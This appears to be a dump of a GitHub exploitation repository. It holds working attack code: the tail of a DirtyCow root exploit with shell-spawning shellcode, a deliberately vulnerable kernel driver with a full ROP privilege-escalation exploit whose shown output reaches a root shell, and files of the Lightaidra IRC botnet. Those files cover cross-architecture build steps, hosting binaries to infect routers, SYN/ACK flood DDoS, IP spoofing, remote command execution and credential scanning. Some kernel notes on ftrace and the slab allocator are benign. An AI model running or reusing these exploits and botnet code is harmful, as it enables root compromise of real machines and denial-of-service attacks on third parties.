0x00, 67 | 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 69 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 70 | 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 71 | 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 72 | 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 73 | 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 74 | 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 75 | 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 76 | 0x89, 0xe1, 0xcd, 0x80 77 | }; 78 | unsigned int sc_len = 136; 79 | */ 80 | 81 | void *madviseThread(void *arg) 82 | { 83 | char *str; 84 | str=(char*)arg; 85 | int i,c=0; 86 | for(i=0;i<1000000 && !stop;i++) { 87 | c+=madvise(map,100,MADV_DONTNEED); 88 | } 89 | printf("thread stopped\n"); 90 | } 91 | 92 | void *procselfmemThread(void *arg) 93 | { 94 | char *str; 95 | str=(char*)arg; 96 | int f=open("/proc/self/mem",O_RDWR); 97 | int i,c=0; 98 | for(i=0;i<1000000 && !stop;i++) { 99 | lseek(f,map,SEEK_SET); 100 | c+=write(f, str, sc_len); 101 | } 102 | printf("thread stopped\n"); 103 | } 104 | 105 | void *waitForWrite(void *arg) { 106 | char buf[sc_len]; 107 | 108 | for(;;) { 109 | FILE *fp = fopen(suid_binary, "rb"); 110 | 111 | fread(buf, sc_len, 1, fp); 112 | 113 | if(memcmp(buf, sc, sc_len) == 0) { 114 | printf("%s is overwritten\n", suid_binary); 115 | break; 116 | } 117 | 118 | fclose(fp); 119 | sleep(1); 120 | } 121 | 122 | stop = 1; 123 | 124 | printf("Popping root shell.\n"); 125 | printf("Don't forget to restore /tmp/bak\n"); 126 | 127 | system(suid_binary); 128 | } 129 | 130 | int main(int argc,char *argv[]) { 131 | char *backup; 132 | 133 | printf("DirtyCow root privilege escalation\n"); 134 | printf("Backing up %s.. to /tmp/bak\n", suid_binary); 135 | 136 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); 137 | system(backup); 138 | 139 | f = open(suid_binary,O_RDONLY); 140 | fstat(f,&st); 141 | 142 | printf("Size of binary: %d\n", st.st_size); 143 | 144 | char payload[st.st_size]; 145 | memset(payload, 0x90, st.st_size); 146 | memcpy(payload, sc, sc_len+1); 147 | 148 | map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); 149 | 150 | printf("Racing, this may take a while..\n"); 151 | 152 | pthread_create(&pth1, NULL, &madviseThread, suid_binary); 153 | pthread_create(&pth2, NULL, &procselfmemThread, payload); 154 | pthread_create(&pth3, NULL, &waitForWrite, NULL); 155 | 156 | pthread_join(pth3, NULL); 157 | 158 | return 0; 159 | } 160 | -------------------------------------------------------------------------------- /kernel/ftrace.md: -------------------------------------------------------------------------------- 1 | # ftrace 2 | **tracer for internal kernel function flow** 3 | - `mount -t debugfs nodev /sys/kernel/debug` 4 | ``` 5 | root@6c7f37ea6051:/sys/kernel/debug# ls -l 6 | total 0 7 | drwxr-xr-x 2 root root 0 Oct 12 17:50 acpi 8 | drwxr-xr-x 2 root root 0 Oct 12 17:50 aoe 9 | drwxr-xr-x 2 root root 0 Oct 12 17:50 aufs 10 | drwxr-xr-x 32 root root 0 Oct 12 17:51 bdi 11 | drwxr-xr-x 2 root root 0 Oct 12 17:50 extfrag 12 | -rw-r--r-- 1 root root 0 Oct 12 17:50 fault_around_bytes 13 | drwxr-xr-x 2 root root 0 Oct 12 17:50 hid 14 | drwxr-xr-x 2 root root 0 Oct 12 17:50 kprobes 15 | drwxr-xr-x 2 root root 0 Oct 12 17:50 nbd 16 | drwxr-xr-x 2 root root 0 Oct 12 17:50 pm_qos 17 | drwxr-xr-x 2 root root 0 Oct 12 17:50 regmap 18 | -rw-r--r-- 1 root root 0 Oct 12 17:50 sched_features 19 | -r--r--r-- 1 root root 0 Oct 12 17:50 sleep_time 20 | --w------- 1 root root 0 Oct 12 17:50 split_huge_pages 21 | -r--r--r-- 1 root root 0 Oct 12 17:50 suspend_stats 22 | dr-xr-xr-x 3 root root 0 Oct 12 17:50 tracing 23 | drwxr-xr-x 2 root root 0 Oct 12 17:50 virtio-ports 24 | -r--r--r-- 1 root root 0 Oct 12 17:50 wakeup_sources 25 | drwxr-xr-x 2 root root 0 Oct 12 17:50 x86 26 | 27 | root@6c7f37ea6051:/sys/kernel/debug/tracing# cat current_tracer 28 | nop 29 | root@6c7f37ea6051:/sys/kernel/debug/tracing# cat available_tracers 30 | blk mmiotrace function_graph function nop 31 | ``` 32 | - below is main file in /sys/kernel/debug/tracing 33 | ``` 34 | available_tracers 35 | current_tracer 36 | trace -> trace log file 37 | README -> how to use 38 | ``` 39 | - event tracing( interrupt, scheduling, filesystem ... ) 40 | - kernel function tracing( all of kernel function, call graph, stack usage ) 41 | - latency tracing( wakeup, wakeup_rt, irqsoff, preemptoff, preemptirqsoff ) 42 | 43 | **function_graph** 44 | ``` 45 | 0) 1.013 us | } 46 | 0) | unlock_page() { 47 | 1) 0.023 us | _raw_spin_lock_irqsave(); 48 | 0) | page_waitqueue() { 49 | 0) 0.030 us | bit_waitqueue(); 50 | 1) 0.036 us | _raw_spin_unlock_irqrestore(); 51 | 0) 0.270 us | } 52 | 1) 0.029 us | pcpu_chunk_addr(); 53 | 0) 0.028 us | __wake_up_bit(); 54 | 0) 0.756 us | } 55 | 1) 0.028 us | pcpu_chunk_addr(); 56 | 0) | alloc_set_pte() { 57 | 0) 0.021 us | add_mm_counter_fast(); 58 | 0) | page_add_file_rmap() { 59 | 1) 7.126 us | } 60 | 0) 0.028 us | lock_page_memcg(); 61 | 1) 7.520 us | } 62 | 0) 0.012 us | unlock_page_memcg(); 63 | 1) 0.048 us | _raw_spin_lock_irqsave(); 64 | 0) 0.526 us | } 65 | ``` 66 | # How to trace kernel function flow? 67 | **Using gcc compiler's -pg option** 68 | - with out -pg option is below one 69 | ``` 70 | 0x0000000000400526 <+0>: push rbp 71 | 0x0000000000400527 <+1>: mov rbp,rsp 72 | 0x000000000040052a <+4>: sub rsp,0x10 73 | 0x000000000040052e <+8>: movabs rax,0x6e6973756a65654c 74 | 0x0000000000400538 <+18>: mov QWORD PTR [rbp-0x10],rax 75 | 0x000000000040053c <+22>: mov BYTE PTR [rbp-0x8],0x0 76 | 0x0000000000400540 <+26>: lea rax,[rbp-0x10] 77 | 0x0000000000400544 <+30>: mov rsi,rax 78 | 0x0000000000400547 <+33>: mov edi,0x4005e4 79 | 0x000000000040054c <+38>: mov eax,0x0 80 | 0x0000000000400551 <+43>: call 0x400400 81 | 0x0000000000400556 <+48>: mov eax,0x0 82 | 0x000000000040055b <+53>: leave 83 | 0x000000000040055c <+54>: ret 84 | ``` 85 | - with -pg option is below one 86 | ``` 87 | 0x0000000000400686 <+0>: push rbp 88 | 0x0000000000400687 <+1>: mov rbp,rsp 89 | 0x000000000040068a <+4>: sub rsp,0x10 90 | 0x000000000040068e <+8>: call 0x400520 91 | 0x0000000000400693 <+13>: movabs rax,0x6e6973756a65654c 92 | 0x000000000040069d <+23>: mov QWORD PTR [rbp-0x10],rax 93 | 0x00000000004006a1 <+27>: mov BYTE PTR [rbp-0x8],0x0 94 | 0x00000000004006a5 <+31>: lea rax,[rbp-0x10] 95 | 0x00000000004006a9 <+35>: mov rsi,rax 96 | 0x00000000004006ac <+38>: mov edi,0x40078c 97 | 0x00000000004006b1 <+43>: mov eax,0x0 98 | 0x00000000004006b6 <+48>: call 0x4004f0 99 | 0x00000000004006bb <+53>: mov eax,0x0 100 | 0x00000000004006c0 <+58>: leave 101 | 0x00000000004006c1 <+59>: ret 102 | ``` 103 | - call mcount is added in this binary. 104 | 105 | # mcount hooking 106 | **One of hooking mechnisms** 107 | - complier level function -> ABI 108 | - if compile with gcc -pg option, mcount brench code is inserted 109 | - if developer can code some wanted routine in mcount function, hook is not hard. 110 | - ftrace use this mechnism and, by revising mcount internal routine, it can trace 111 | internal kernel function. 112 | 113 | -------------------------------------------------------------------------------- /kernel/my_proc_create.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | MODULE_LICENSE("GPL"); 11 | MODULE_AUTHOR("Asiagmaing"); 12 | MODULE_DESCRIPTION("proc create test and exploitation"); 13 | 14 | /* 15 | ssize_t (*read) (struct file *, char __user *, size_t, loff_t *); 16 | ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); 17 | */ 18 | 19 | static ssize_t my_read(struct file *filp, char __user *buf, loff_t *f_pos){ 20 | printk(KERN_INFO"file_operations read is hooked...\n"); 21 | return count; 22 | } 23 | 24 | static ssize_t my_write(struct file *filp, char __user *buf, loff_t *f_pos){ 25 | printk(KERN_INFO"file_operations write is hooked...\n"); 26 | return count; 27 | } 28 | 29 | static struct file_operations my_fops = { 30 | .read = (void *)my_read, 31 | .write = (void *)my_write 32 | }; 33 | 34 | 35 | static int my_proc_create(void){ 36 | 37 | struct proc_dir_entry *my_proc_entry = proc_create("my_proc", 0666, NULL, &my_fops); 38 | printk(KERN_INFO"my_proc_entry pointer : %p\n", my_proc_entry); 39 | /* my_proc_entry->read_proc = my_proc_read; -> this is old version */ 40 | return 0; 41 | } 42 | 43 | static void my_proc_exit(void){ 44 | 45 | printk(KERN_INFO"module unloaded : my_proc\n"); 46 | remove_proc_entry("my_proc", 0); 47 | 48 | } 49 | 50 | module_init(my_proc_create); 51 | module_exit(my_proc_exit); 52 | -------------------------------------------------------------------------------- /kernel/slab.md: -------------------------------------------------------------------------------- 1 | # slab allocator 2 | **kmalloc -> allocate mamory for objects smaller than page size in the kernel.** 3 | - kernel uses 3 layers for allocating and managing memory. 4 | - `static __always_inline void *kmalloc(size_t size, gfp_t flags)` 5 | - `kmalloc() -> __kmalloc() -> __do_kmalloc() -> slab_alloc() -> kmalloc_slab() or slab_alloc()` 6 | - below code is little bit different to other kernel routine. 7 | ``` 8 | p1 = kmalloc(32); 9 | ... 10 | slab_get_obj(); 11 | 12 | objp = index_to_obj(cachep, slabp, slabp->free); 13 | slab->s_mem + cache->size * idx; 14 | next = slab_bufctl(slabp)[slabp->free]; 15 | (kmem_bufctl_t *) (slabp + 1); 16 | slabp->free = next; 17 | ``` 18 | # struct kmem_cache 19 | **defined in mm/slab.h** 20 | ``` 21 | struct kmem_cache{ 22 | unsigned int object_size; 23 | unsigned int size; 24 | unsigned int align; 25 | unsigned long flags; 26 | const char *name; 27 | int refcount; 28 | void (*ctor)(void *); 29 | struct list_head list; 30 | }; 31 | ``` 32 | -------------------------------------------------------------------------------- /kernel_rop/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += drv.o 2 | 3 | CC=gcc 4 | ccflags-y += "-g" 5 | ccflags-y += "-O0" 6 | 7 | all: 8 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 9 | # compile the trigger 10 | $(CC) trigger.c -O2 -o trigger 11 | 12 | clean: 13 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 14 | rm -fr ./trigger 15 | -------------------------------------------------------------------------------- /kernel_rop/README.md: -------------------------------------------------------------------------------- 1 | # Linux Kernel ROP demo 2 | 3 | This is a vulnerable Linux kernel driver used to demonstrate in-kernel 4 | privilege escalation ROP (Return Oriented Programming) chain in practice. The 5 | article URL for Part 1 is available at 6 | . 7 | 8 | The driver module is vulnerable to OOB access and allows arbitrary code 9 | execution. An arbitrary offset can be passed from user space via the provided 10 | ioctl(). This offset is then used as the index for the 'ops' array to obtain 11 | the function address to be executed. 12 | 13 | * drv.c - vulnerable kernel driver 14 | * trigger.c - user-space application to trigger the OOB access via the provided 15 | ioctl 16 | * find_offset.py - helper script for finding the correct offset into the "ops" array 17 | * rop_exploit.c - ROP exploit for the "drv.c" kernel driver 18 | 19 | The goal is to construct and execute a ROP chain that will satisfy the 20 | following requirements: 21 | 22 | * Execute a privilege escalation payload 23 | * Data residing in user space may be referenced (i.e., "fetching" data from 24 | user space is allowed) 25 | * Instructions residing in user space may not be executed 26 | 27 | ``` 28 | vnik@ubuntu:~$ dmesg | grep addr | grep ops 29 | [ 244.142035] addr(ops) = ffffffffa02e9340 30 | vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets 31 | offset = 18446744073644231139 32 | gadget = xchg eax, esp ; ret 0x11e8 33 | stack addr = 8108e258 34 | 35 | vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit 36 | vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340 37 | array base address = 0xffffffffa02e9340 38 | stack address = 0x8108e258 39 | # id 40 | uid=0(root) gid=0(root) groups=0(root) 41 | # 42 | ``` 43 | -------------------------------------------------------------------------------- /kernel_rop/drv.c: -------------------------------------------------------------------------------- 1 | /** 2 | * Vulnerable kernel driver 3 | * 4 | * This module is vulnerable to OOB access and allows arbitrary code 5 | * execution. 6 | * An arbitrary offset can be passed from user space via the provided ioctl(). 7 | * This offset is then used as an index for the 'ops' array to obtain the 8 | * function address to be executed. 9 | * 10 | * 11 | * Full article: https://cyseclabs.com/page?n=17012016 12 | * 13 | * Author: Vitaly Nikolenko 14 | * Email: vnik@cyseclabs.com 15 | **/ 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include "drv.h" 22 | 23 | #define DEVICE_NAME "vulndrv" 24 | #define DEVICE_PATH "/dev/vulndrv" 25 | 26 | static int device_open(struct inode *, struct file *); 27 | static long device_ioctl(struct file *, unsigned int, unsigned long); 28 | static int device_release(struct inode *, struct file *f); 29 | 30 | static struct class *class; 31 | unsigned long *ops[3]; 32 | static int major_no; 33 | 34 | static struct file_operations fops = { 35 | .open = device_open, 36 | .release = device_release, 37 | .unlocked_ioctl = device_ioctl 38 | }; 39 | 40 | 41 | static int device_release(struct inode *i, struct file *f) { 42 | printk(KERN_INFO "device released!\n"); 43 | return 0; 44 | } 45 | 46 | static int device_open(struct inode *i, struct file *f) { 47 | printk(KERN_INFO "device opened!\n"); 48 | return 0; 49 | } 50 | 51 | static long device_ioctl(struct file *file, unsigned int cmd, unsigned long args) { 52 | struct drv_req *req; 53 | void (*fn)(void); 54 | 55 | switch(cmd) { 56 | case 0: 57 | req = (struct drv_req *)args; 58 | printk(KERN_INFO "size = %lx\n", req->offset); 59 | printk(KERN_INFO "fn is at %p\n", &ops[req->offset]); 60 | fn = (void *)&ops[req->offset]; 61 | fn(); 62 | break; 63 | default: 64 | break; 65 | } 66 | 67 | return 0; 68 | } 69 | 70 | static int m_init(void) { 71 | printk(KERN_INFO "addr(ops) = %p\n", &ops); 72 | major_no = register_chrdev(0, DEVICE_NAME, &fops); 73 | class = class_create(THIS_MODULE, DEVICE_NAME); 74 | device_create(class, NULL, MKDEV(major_no, 0), NULL, DEVICE_NAME); 75 | 76 | return 0; 77 | } 78 | 79 | static void m_exit(void) { 80 | device_destroy(class, MKDEV(major_no, 0)); 81 | class_unregister(class); 82 | class_destroy(class); 83 | unregister_chrdev(major_no, DEVICE_NAME); 84 | printk(KERN_INFO "Driver unloaded\n"); 85 | } 86 | 87 | module_init(m_init); 88 | module_exit(m_exit); 89 | 90 | MODULE_LICENSE("GPL"); 91 | -------------------------------------------------------------------------------- /kernel_rop/drv.h: -------------------------------------------------------------------------------- 1 | struct drv_req { 2 | unsigned long offset; 3 | }; 4 | -------------------------------------------------------------------------------- /kernel_rop/drv.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/kernel_rop/drv.ko -------------------------------------------------------------------------------- /kernel_rop/drv.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | MODULE_INFO(name, KBUILD_MODNAME); 7 | 8 | __visible struct module __this_module 9 | __attribute__((section(".gnu.linkonce.this_module"))) = { 10 | .name = KBUILD_MODNAME, 11 | .init = init_module, 12 | #ifdef CONFIG_MODULE_UNLOAD 13 | .exit = cleanup_module, 14 | #endif 15 | .arch = MODULE_ARCH_INIT, 16 | }; 17 | 18 | static const char __module_depends[] 19 | __used 20 | __attribute__((section(".modinfo"))) = 21 | "depends="; 22 | 23 | 24 | MODULE_INFO(srcversion, "C84E79A732E5B32E6F9FCB4"); 25 | -------------------------------------------------------------------------------- /kernel_rop/drv.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/kernel_rop/drv.mod.o -------------------------------------------------------------------------------- /kernel_rop/drv.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/kernel_rop/drv.o -------------------------------------------------------------------------------- /kernel_rop/find_offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | base_addr = int(sys.argv[1], 16) 5 | 6 | f = open(sys.argv[2], 'r') # gadgets 7 | 8 | for line in f.readlines(): 9 | target_str, gadget = line.split(':') 10 | target_addr = int(target_str, 16) 11 | 12 | # check alignment 13 | if target_addr % 8 != 0: 14 | continue 15 | 16 | offset = (target_addr - base_addr) / 8 17 | print 'offset =', (1 << 64) + offset 18 | print 'gadget =', gadget.strip() 19 | print 'stack addr = %x' % (target_addr & 0xffffffff) 20 | break 21 | -------------------------------------------------------------------------------- /kernel_rop/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/asiagaming/Desktop/kernel_ctf/kernel_rop/drv.ko 2 | -------------------------------------------------------------------------------- /kernel_rop/rop_exploit.c: -------------------------------------------------------------------------------- 1 | /** 2 | * ROP exploit for drv.c kernel module 3 | * 4 | * gcc rop_exploit.c -O2 -o rop_exploit 5 | * 6 | * Email: vnik@cyseclabs.com 7 | * Vitaly Nikolenko 8 | */ 9 | 10 | #define _GNU_SOURCE 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include "drv.h" 22 | 23 | #define DEVICE_PATH "/dev/vulndrv" 24 | 25 | unsigned long user_cs; 26 | unsigned long user_ss; 27 | unsigned long user_rflags; 28 | 29 | static void save_state() { 30 | asm( 31 | "movq %%cs, %0\n" 32 | "movq %%ss, %1\n" 33 | "pushfq\n" 34 | "popq %2\n" 35 | : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" ); 36 | } 37 | 38 | void shell(void) { 39 | if(!getuid()) 40 | system("/bin/sh"); 41 | 42 | exit(0); 43 | } 44 | 45 | void usage(char *bin_name) { 46 | fprintf(stderr, "%s array_offset_decimal array_base_address_hex\n", bin_name); 47 | } 48 | 49 | int main(int argc, char *argv[]) 50 | { 51 | int fd; 52 | struct drv_req req; 53 | void *mapped, *temp_stack; 54 | unsigned long base_addr, stack_addr, mmap_addr, *fake_stack; 55 | 56 | if (argc != 3) { 57 | usage(argv[0]); 58 | return -1; 59 | } 60 | 61 | req.offset = strtoul(argv[1], NULL, 10); 62 | base_addr = strtoul(argv[2], NULL, 16); 63 | 64 | printf("array base address = 0x%lx\n", base_addr); 65 | stack_addr = (base_addr + (req.offset * 8)) & 0xffffffff; 66 | fprintf(stdout, "stack address = 0x%lx\n", stack_addr); 67 | 68 | mmap_addr = stack_addr & 0xffff0000; 69 | assert((mapped = mmap((void*)mmap_addr, 0x20000, 7, 0x32, 0, 0)) == (void*)mmap_addr); 70 | assert((temp_stack = mmap((void*)0x30000000, 0x10000000, 7, 0x32, 0, 0)) == (void*)0x30000000); 71 | 72 | save_state(); 73 | fake_stack = (unsigned long *)(stack_addr); 74 | *fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */ 75 | 76 | fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8); 77 | 78 | *fake_stack ++= 0x0UL; /* NULL */ 79 | *fake_stack ++= 0xffffffff81095430UL; /* prepare_kernel_cred() */ 80 | 81 | *fake_stack ++= 0xffffffff810dc796UL; /* pop %rdx; ret */ 82 | //*fake_stack ++= 0xffffffff81095190UL; /* commit_creds() */ 83 | *fake_stack ++= 0xffffffff81095196UL; // commit_creds() + 2 instructions 84 | 85 | *fake_stack ++= 0xffffffff81036b70UL; /* mov %rax, %rdi; call %rdx */ 86 | 87 | *fake_stack ++= 0xffffffff81052804UL; // swapgs ; pop rbp ; ret 88 | *fake_stack ++= 0xdeadbeefUL; // dummy placeholder 89 | 90 | *fake_stack ++= 0xffffffff81053056UL; /* iretq */ 91 | *fake_stack ++= (unsigned long)shell; /* spawn a shell */ 92 | *fake_stack ++= user_cs; /* saved CS */ 93 | *fake_stack ++= user_rflags; /* saved EFLAGS */ 94 | *fake_stack ++= (unsigned long)(temp_stack+0x5000000); /* mmaped stack region in user space */ 95 | *fake_stack ++= user_ss; /* saved SS */ 96 | 97 | 98 | //map = mmap((void *)..., ..., 3, 0x32, 0, 0); 99 | 100 | fd = open(DEVICE_PATH, O_RDONLY); 101 | 102 | if (fd == -1) { 103 | perror("open"); 104 | } 105 | 106 | ioctl(fd, 0, &req); 107 | 108 | return 0; 109 | } 110 | -------------------------------------------------------------------------------- /kernel_rop/trigger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/kernel_rop/trigger -------------------------------------------------------------------------------- /kernel_rop/trigger.c: -------------------------------------------------------------------------------- 1 | /** 2 | * User-space trigger application for OOB in drv.c 3 | * 4 | * 5 | * Full article: https://cyseclabs.com/page?n=17012016 6 | * 7 | * Author: Vitaly Nikolenko 8 | * Email: vnik@cyseclabs.com 9 | * 10 | **/ 11 | 12 | #define _GNU_SOURCE 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include "drv.h" 20 | 21 | #define DEVICE_PATH "/dev/vulndrv" 22 | 23 | int main(int argc, char **argv) { 24 | int fd; 25 | struct drv_req req; 26 | 27 | req.offset = atoll(argv[1]); 28 | 29 | //map = mmap((void *)..., ..., 3, 0x32, 0, 0); 30 | 31 | fd = open(DEVICE_PATH, O_RDONLY); 32 | 33 | if (fd == -1) { 34 | perror("open"); 35 | } 36 | 37 | ioctl(fd, 0, &req); 38 | 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /lightaidra/Makefile: -------------------------------------------------------------------------------- 1 | # Makefile - Lightaidra version 0x2012 2 | # Copyright (C) 2008-2015 Federico Fazzi, . 3 | # 4 | # LEGAL DISCLAIMER: It is the end user's responsibility to obey 5 | # all applicable local, state and federal laws. Developers assume 6 | # no liability and are not responsible for any misuse or damage 7 | # caused by this program. 8 | 9 | CFLAGS=-lpthread -pthread 10 | x86_32cc=/usr/bin/gcc -m32 11 | x86_64cc=/usr/bin/gcc -m64 -O2 12 | mipsel_cc=./bin/cross-compiler-mipsel/bin/mipsel-gcc 13 | mips_cc=./bin/cross-compiler-mips/bin/mips-gcc 14 | superh_cc=./bin/cross-compiler-sh4/bin/sh4-gcc 15 | arm_cc=./bin/cross-compiler-armv5l/bin/armv5l-gcc 16 | ppc_cc=./bin/cross-compiler-powerpc/bin/powerpc-gcc 17 | 18 | # NAME OF BINARIES: 19 | x86_32bin=bin/x86_32 20 | x86_64bin=bin/x86_64 21 | mipsel_bin=bin/mipsel 22 | mips_bin=bin/mips 23 | superh_bin=bin/sh 24 | arm_bin=bin/arm 25 | ppc_bin=bin/ppc 26 | hide_bin=bin/hide 27 | 28 | hide32 : source/hide.c 29 | ${x86_32cc} -o ${hide_bin} source/hide.c 30 | hide64 : source/hide.c 31 | ${x86_64cc} -o ${hide_bin} source/hide.c 32 | 33 | x86_32 : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 34 | ${x86_32cc} ${CFLAGS} -o ${x86_32bin} source/main.c source/utils.c \ 35 | source/irc.c source/requests.c source/scan.c source/attacks.c 36 | 37 | x86_64 : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 38 | ${x86_64cc} ${CFLAGS} -o ${x86_64bin} source/main.c source/utils.c \ 39 | source/irc.c source/requests.c source/scan.c source/attacks.c 40 | 41 | mipsel : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 42 | ${mipsel_cc} -static ${CFLAGS} -DMIPSEL -o ${mipsel_bin} source/main.c source/utils.c \ 43 | source/irc.c source/requests.c source/scan.c source/attacks.c 44 | 45 | mips : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 46 | ${mips_cc} -static ${CFLAGS} -DMIPS -o ${mips_bin} source/main.c source/utils.c \ 47 | source/irc.c source/requests.c source/scan.c source/attacks.c 48 | 49 | superh : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 50 | ${superh_cc} -static ${CFLAGS} -DSUPERH -o ${superh_bin} source/main.c source/utils.c \ 51 | source/irc.c source/requests.c source/scan.c source/attacks.c 52 | 53 | arm : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 54 | ${arm_cc} -static ${CFLAGS} -DARM -o ${arm_bin} source/main.c source/utils.c \ 55 | source/irc.c source/requests.c source/scan.c source/attacks.c 56 | 57 | ppc : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 58 | ${ppc_cc} -static ${CFLAGS} -DPPC -o ${ppc_bin} source/main.c source/utils.c \ 59 | source/irc.c source/requests.c source/scan.c source/attacks.c 60 | 61 | clean : 62 | rm -fr source/*.o 63 | -------------------------------------------------------------------------------- /lightaidra/README.md: -------------------------------------------------------------------------------- 1 | # Aegis lightaidra 2 | 3 | **How to build??** 4 | - Do `mkdir ./bin` 5 | - Do `make x86_64` 6 | - Do `./bin/x86_64` 7 | 8 | If cross compilers are not included in **bin/** directory you will need 9 | to download these cross-compilers and extract them into **lightaidra/bin/** 10 | 11 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 12 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 13 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 14 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 15 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 16 | 17 | Config.h 18 | -------- 19 | 20 | 21 | **IMPORTANT:** `REFERENCE_HTTP` in **include/config.h** must be the server where you upload the binaries (mipsel, mips, arm, ppc, sh4) and **getbinaries.sh**. 22 | If you change the `name of binaries` you must update the **Makefile** and **getbinaries.sh** too. 23 | 24 | ```bash 25 | deftcode ~ $ vi include/config.h 26 | ``` 27 | 28 | Build binaries 29 | -------------- 30 | 31 | ```bash 32 | deftcode ~ $ make x86_32 (for 32bit) 33 | deftcode ~ $ make x86_64 (for 64bit) 34 | deftcode ~ # ./bin/x86_64 35 | ``` 36 | 37 | Build binaries for MIPSEL, MIPS, ARM, PPC, SUPERH 38 | 39 | ```bash 40 | deftcode ~ $ make mipsel mips arm ppc superh 41 | ``` 42 | 43 | Now start your httpd and upload the binaries and getbinaries.sh 44 | Now go to IRC server and command your bot. 45 | 46 | BUGS 47 | ---- 48 | 49 | If you find bugs (which is quite likely), please submit them to 50 | with specific information, such as your command-line, the nature of the bug and other. 51 | -------------------------------------------------------------------------------- /lightaidra/bin/x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/lightaidra/bin/x86_64 -------------------------------------------------------------------------------- /lightaidra/docs/CHANGELOG: -------------------------------------------------------------------------------- 1 | Lightaidra version 0x2012 (Released 29-1-2012) 2 | 3 | * added more router architettures (mips, ppc, superh, arm), 4 | with getbinaries.sh for fast download. 5 | * added function to store local pid in /var/run (for no clones). 6 | * replaced get_local_ip() with new getextip(), 7 | using automation.whatismyip.com. 8 | * added set up ip spoofing. 9 | * adapted .synflood, .ngsynflood, .ackflood, .ngackflood, 10 | from ktx with selected ddos. 11 | * added .setchan function to set new master channel. 12 | * added multiple irc server and port connection, 13 | with encrypt/decrypt features. 14 | * fixed various requests/scanner bugs. 15 | * removed easystart.sh for inutility. 16 | 17 | -------------------------------------------------------------------------------- /lightaidra/docs/HELP: -------------------------------------------------------------------------------- 1 | 2 | * *** Access Commands: 3 | * 4 | * .login - login to bot's party-line 5 | * .logout - logout from bot's party-line 6 | * 7 | * *** Miscs Commands 8 | * 9 | * .exec - execute a system command 10 | * .version - show the current version of bot 11 | * .status - show the status of bot 12 | * .help - show this help message 13 | * 14 | * *** Scan Commands 15 | * 16 | * .advscan - scan with user:pass (A.B) classes sets by you 17 | * .advscan - scan with d-link config reset bug 18 | * .advscan->recursive - scan local ip range with user:pass, (C.D) classes random 19 | * .advscan->recursive - scan local ip range with d-link config reset bug 20 | * .advscan->random - scan random ip range with user:pass, (A.B) classes random 21 | * .advscan->random - scan random ip range with d-link config reset bug 22 | * .advscan->random->b - scan local ip range with user:pass, A.(B) class random 23 | * .advscan->random->b 